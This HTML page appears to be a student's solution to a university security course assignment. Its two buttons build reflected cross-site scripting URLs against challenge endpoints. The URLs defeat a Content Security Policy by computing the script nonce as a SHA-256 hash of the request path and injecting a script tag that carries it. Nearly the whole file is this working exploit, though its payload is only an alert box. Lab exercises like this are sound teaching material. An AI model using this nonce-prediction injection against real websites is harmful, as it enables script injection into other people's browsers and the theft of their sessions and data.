<!DOCTYPE html>
<html>
<head>
    <title>XSS</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            padding: 50px;
            text-align: center;
        }
        button {
            background-color: #4CAF50;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 4px 2px;
            cursor: pointer;
            border: none;
            border-radius: 4px;
        }
    </style>
    <script>
        async function sha256(message) {
            const msgBuffer = new TextEncoder('utf-8').encode(message);
            const hashBuffer = await crypto.subtle.digest('SHA-256', msgBuffer);
            const hashArray = Array.from(new Uint8Array(hashBuffer));
            const hashHex = hashArray.map(b => ('00' + b.toString(16)).slice(-2)).join('');
            return hashHex;
        }
        async function generateLink1() {
            var r = Math.floor(Math.random() * 10000000000000000);
            var t = Math.floor(new Date().getTime() / 1000);
            var first_url = '/assign4/chall1/xss_csp?r=' + r + '&t=' + t;
            const nonce = await sha256(first_url);
            var url = 'http://vad700.cse.lsu.edu' + first_url + '&mike=mike-ii.jpg%27><script nonce=' + nonce + '%3Ealert(%27XSS%27);%3C/script%3E';
            window.location.href = url;
        }
        async function generateLink2() {
            var r = Math.floor(Math.random() * 10000000000000000);
            var t = Math.floor(new Date().getTime() / 1000);
            var first_url = '/assign4/chall2/xss_csp?r=' + r + '&t=' + t;
            const nonce = await sha256(first_url);
            var url = 'http://vad700.cse.lsu.edu' + first_url + '&mike=mike-ii.jpg%27><script nonce=' + nonce + '%3Ealert(%27XSS%27);%3C/script%3E';
            window.location.href = url;
        }
    </script>
</head>
<body>
    <button onclick="generateLink1()">Challenge 1</button>
    <button onclick="generateLink2()">Challenge 2</button>
</body>
</html>
